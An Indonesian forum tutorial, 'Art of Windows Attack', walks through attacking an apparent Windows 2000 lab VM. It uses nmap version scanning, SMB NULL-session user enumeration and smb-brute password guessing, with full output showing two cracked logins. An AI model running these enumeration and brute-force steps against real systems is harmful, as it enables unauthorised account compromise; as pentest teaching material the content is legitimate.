New Posts

New Topics

Art of Windows Attack
by peneter

Wednesday, 18 Jan 2012

Ok kita mulai aja dan perlu di ingat gw hanya menggunakan target yang victim, jadi apa pun resikonya gw gak nanggung, soalnya gw udah nanggung resikonya kemarin2,hahahha, jadi gw share aja dah.[0x01] scan dan userenum, di sini akan gw bahas bagaimana mendapatkan sebuah akses kedalam mesin target, tentunya target yang dimaksud adalah target yang bermesinkan atau berplatform windows. Yups, seperti judulnya yang diatas, langkah pertama adalah lakukan scanning terhadap mesin target, gunakan nmap untuk melakukan scanning, kenapa pake nmap gak yang lain sebab nmap banyak digunakan dan terbukti ampuh, dan apabila ada yang mau menggunakan scanner lain silahkan aja, gak ada yang larang.

 

kiddies@shellstr0m - nmap -sV 192.168.80.129

nah resultnya kayak gini :

        Starting Nmap 4.85BETA10 ( http://nmap.org ) at 2009-07-03 10:03 GMT
	Warning: File ./nmap-services exists, but Nmap is using /usr/local/share/nmap
/nmap-services for security and 
        consistency reasons.  
	set NMAPDIR=. to give priority to files in your local directory 
(may affect the other data files too).
	Interesting ports on 192.168.80.129:
	Not shown: 990 closed ports
	PORT     STATE SERVICE      VERSION
	80/tcp   open  http         Microsoft IIS webserver 5.0
	135/tcp  open  mstask       Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
	139/tcp  open  netbios-ssn
	443/tcp  open  https?
	445/tcp  open  microsoft-ds Microsoft Windows 2000 microsoft-ds
	1025/tcp open  mstask       Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
	1026/tcp open  msrpc        Microsoft Windows RPC
	1027/tcp open  msrpc        Microsoft Windows RPC
	1433/tcp open  ms-sql-s     Microsoft SQL Server 2000 8.00.194; RTM
	3372/tcp open  msdtc?
	1 service unrecognized despite returning data. If you know the service/version, 
please submit the following 
        fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
	SF-Port3372-TCP:V=4.85BETA10%I=7%D=7/3%Time=4A4DD777%P=i686-pc-linux-gnu%r
	SF:(GetRequest,6,"\x18\xc1\n\0x\x01")%r(RTSPRequest,6,"\x18\xc1\n\0x\x01")
	SF:%r(HTTPOptions,6,"\x18\xc1\n\0x\x01")%r(Help,6,"\x18\xc1\n\0x\x01")%r(S
	SF:SLSessionReq,6,"\x18\xc1\n\0x\x01")%r(FourOhFourRequest,6,"\x18\xc1\n\0
	SF:x\x01")%r(LPDString,6,"\x18\xc1\n\0x\x01")%r(SIPOptions,6,"\x18\xc1\n\0
	SF:x\x01");
	MAC Address: 00:0C:29:CC:CF:46 (VMware)
	Service Info: OS: Windows

	Service detection performed. Please report any incorrect results at 
http://nmap.org/submit/ .
	Nmap done: 1 IP address (1 host up) scanned in 71.68 seconds


Dari hasil scan tersebut, banyak sekali listing port yang terbuka dan kita bisa melihat server juga banyak menjalankan aplikasinya seperti, IIS,NetBios,SMB, dan lain2. Nah, kebetulannya OS dari si server adalah windows 2000 dari sini kita bisa melakukan beberapa exploitasi terhadap server dengan mengetahui beberapa port listing yang ada dari hasil scanning. Disini kita tau bahwa dari informasi yang ada, bahwa netbios dan SMB pada windows 2000 memiliki vuln “NULL session” dengan mengijinkan kita untuk melakukan enumarasi ke semua acc yang ada.
cara melakukan userenum :

kiddies@shellstr0m - nmap  --script=smb-enum-users 192.168.80.129

Hasil :
 Starting Nmap 4.85BETA10 ( http://nmap.org ) at 2009-07-03 10:21 GMT
	Warning: File ./nmap-services exists, but Nmap is using /usr/local/share/nmap
/nmap-services for        security and consistency reasons.  
	set NMAPDIR=. to give priority to files in your local directory 
(may affect the other data files too).
	Interesting ports on 192.168.80.129:
	Not shown: 990 closed ports
	PORT     STATE SERVICE
	80/tcp   open  http
	135/tcp  open  msrpc
	139/tcp  open  netbios-ssn
	443/tcp  open  https
	445/tcp  open  microsoft-ds
	1025/tcp open  NFS-or-IIS
	1026/tcp open  LSA-or-nterm
	1027/tcp open  IIS
	1433/tcp open  ms-sql-s
	3372/tcp open  msdtc
	MAC Address: 00:0C:29:CC:CF:46 (VMware)

	Host script results:
	|  smb-enum-users:
	|_ SERVER\Administrator, SERVER\backup, SERVER\epp, SERVER\epp_contractor, 
SERVER\Guest, SERVER\IUSR_SERVER, 
        SERVER\IWAM_SERVER, SERVER\Jim, SERVER\John, SERVER\mary,
 SERVER\molly, SERVER\None, SERVER\TsInternetUser

	Nmap done: 1 IP address (1 host up) scanned in 0.63 seconds


dari hasil diatas kita bisa tahu semua user dalam target system :

- Administrator
- Backup
- epp
- epp_contractor
- Guest
- IUSR_SERVER
- IWAM_SERVER
- Jim
- John
- mary
- molly
- TsInternetUser

Untuk teknik lainnya silahkan cari sendiri ok. Untuk nge-brute pake nmap gunakan perintah ini :

kiddies@shellstr0m - nmap  --script=smb-brute 192.168.80.129

Hasilnya :

Starting Nmap 4.85BETA10 ( http://nmap.org ) at 2009-07-03 10:38 GMT
	Warning: File ./nmap-services exists, but Nmap is using /usr/local/share/nmap
/nmap-services for security and consistency reasons.  
	set NMAPDIR=. to give priority to files in your local directory 
(may affect the other data files too).
	Interesting ports on 192.168.80.129:
	Not shown: 990 closed ports
	PORT     STATE SERVICE
	80/tcp   open  http
	135/tcp  open  msrpc
	139/tcp  open  netbios-ssn
	443/tcp  open  https
	445/tcp  open  microsoft-ds
	1025/tcp open  NFS-or-IIS
	1026/tcp open  LSA-or-nterm
	1027/tcp open  IIS
	1433/tcp open  ms-sql-s
	3372/tcp open  msdtc
	MAC Address: 00:0C:29:CC:CF:46 (VMware)

	Host script results:
	|  smb-brute:
	|  backup:pukcab => Login was successful
	|_ epp:password => Login was successful

	Nmap done: 1 IP address (1 host up) scanned in 5.93 seconds

done…alias selesai buat scanning dan mendapatkan usernya.

code by omicron9194 & design by BlueLogic
submission to staff[at]omega.or.id